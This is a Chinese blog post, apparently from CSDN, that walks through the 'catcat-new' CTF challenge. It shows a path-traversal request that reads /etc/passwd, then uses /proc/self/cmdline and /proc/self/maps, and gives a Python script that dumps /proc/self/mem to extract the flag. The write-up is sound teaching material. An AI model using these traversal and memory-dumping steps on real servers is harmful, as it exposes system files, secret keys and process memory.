CTF-catcat-new

于 2024-05-09 21:03:01 发布
阅读量391 收藏 5
点赞数 3
文章标签: 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73625393/article/details/138631667
版权

先判断这个题目是不是关于任意文件读取漏洞,读一个Linux都有的文件/etc/passwd

http://61.147.171.105:60014/info?file=../../../../../etc/passwd

../../../../../etc/passwd 是一个相对路径,用于访问文件系统中的 /etc/passwd 文件。


通过抓包发现Response中的Server是python,那说明该网站是有python运行的.既然是python,当前进程肯定是由python xxx.py启动的,只要能知道当时的命令是什么,就能获取xxx.py的名字,进而读取源码。linux确实有这么个文件,/proc/self/cmdline,用于获取当前启动进程的完整命令。


大部分的python网站脚本名都是app.py

/proc/self/maps来查看当前进程的内存映射情况


取/proc/self/maps+/proc/self/mem+SECRET_KEY的脚本,可一键获取flag.


import requests
import re

baseUrl = "http://61.147.171.105:58344/info?file=../../../../.."

if __name__ == "__main__":
    url = baseUrl + "/proc/self/maps"
    memInfoList = requests.get(url).text.split("\\n")
    mem = ""
    for i in memInfoList:
        memAddress = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
        if memAddress:
            start = int(memAddress.group(1), 16)
            end = int(memAddress.group(2), 16)
            infoUrl = baseUrl + "/proc/self/mem&start=" + str(start) + "&end=" + str(end)
            mem = requests.get(infoUrl).text
            if re.findall(r"{[\w]+}", mem):
                print(re.findall(r"\w+{\w+}", mem))

是个普通苗
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[CTF题目总结-web篇]攻防世界:Cat
T2hunz1
01-10 3878
[CTF题目总结-web篇]攻防世界:Cat
【网络安全 CTFcatcat-new
最新发布
2401_84970268的博客
05-13 817
data = b’’try:except:start = 0end = 0# 检查文件是否存在并可读= 0:else:f.close()else:ifname# 解析命令行参数start = 0end = 0# 打印帮助信息exit()# 获取文件名参数# 获取起始位置参数# 获取结束位置参数= "":# 调用 cat 函数并打印结果else:其中= 0:用于读取start到end地址间的数据。
攻防世界catcat-new
qq_45955869的博客
05-28 1407
攻防世界catcat-new
XCTF-Web-catcat-new
weixin_45723896的博客
06-26 2081
proc/self/mem是当前进程的内存内容,通过修改该文件相当于直接修改当前进程的内存数据。file=../../../../proc/self/cmdline,发现有一个通过python启动app.py的命令。通过/proc/PID可以访问对应PID的进程内核数据,而/proc/self访问的是当前进程的内核数据。先读取/proc/self/maps文件获取可读内容的内存映射地址。/proc/self/maps包含的内容是当前进程的内存映射关系,可通过读取该文件来得到内存数据映射的地址。
【愚公系列】2023年05月 攻防世界-Web(catcat-new
热门推荐
时光隧道
05-26 1万+
任意文件读取漏洞是指攻击者通过在应用程序中输入非法的文件名或路径,从而获取未授权的文件读取权限的漏洞。攻击者可以利用此漏洞来读取系统文件、敏感数据或其他用户数据。这种漏洞通常是由于程序没有正确地检查用户的输入而引起的。建议开发人员在编写应用程序时进行严格的输入验证并使用安全的文件访问方法来避免此类漏洞的发生。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
My-CTF-Challenges
05-16
我的CTF挑战 周大福 名称 语 概括 等级 TCTF2018_决赛 给我看一下贝壳 Java Spring自动绑定/反序列化 中等的
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
攻防世界-Cat
m0_47571887的博客
11-19 1776
打开题目,是一个查询域名的输入框。 输入了www.baidu.com没有反应,输入127.0.0.1发现执行成功,进行命令拼接, 提示了错误url,应该是被过滤掉了,用字典测试一下,发现只有@没有被过滤,考虑到输入的字符都会被url编码后传入,我们试一下宽字节%df 发现报错,我们保存为html查看一下 从这里可以知道后端含有Django框架,我们也知道没有过滤掉@,并且当 curlopt_safe_upload 为 true 时,所以在请求前面加上@的话phpcurl组件...
【网络安全 | CTFcatcat-new
等风来
12-25 1984
读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
CTF_WP-攻防世界web题解,当上项目经理才知道
2401_83739931的博客
04-03 959
发现可能是简单的把命令拼接起来,尝试注入多条命令接下来就是寻找flag的路径catcat-new点进一张图之后,观察url,猜测可能是sql注入尝试各种注入,不可行,根据返回信息猜测可能是任意文件读取漏洞尝试读取/etc/passwd文件,果然可以由于php://被过滤,使用data协议:data://text/plain,
攻防世界-web-cat
mlws1900的博客
07-18 747
得知执行ping命令,用|,&&,||命令尝试,全部被绕过。看了其他人的wp,得知可以用@进行绕过,且为django开发。django的配置文件路径。搜索ctf,获得flag。试试127.0.0.1。显示如上图,一片空白。
CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1488
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
CTFHub技能书解题笔记-RCE-过滤cat
qq_43006864的博客
04-01 2737
打开题目,提示我们过滤了cat命令,也就是不能用cat来读取flag的值。 这里的话我就去查了linux读取文件的命令。 cat 从第一行开始显示文本内容(适用于内容较少的) Tac 从最后一行开始显示,是 cat 的逆顺序 More 一页一页的显示文本内容(适用于内容较多的) less 与 more 类似,但是比 more 更好的是,它可以..
CATCTF wp
wha1e的博客
01-03 3184
总体感觉一般,做题体验不是很好,不过也算是近期比较认真的打的一场比赛。
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值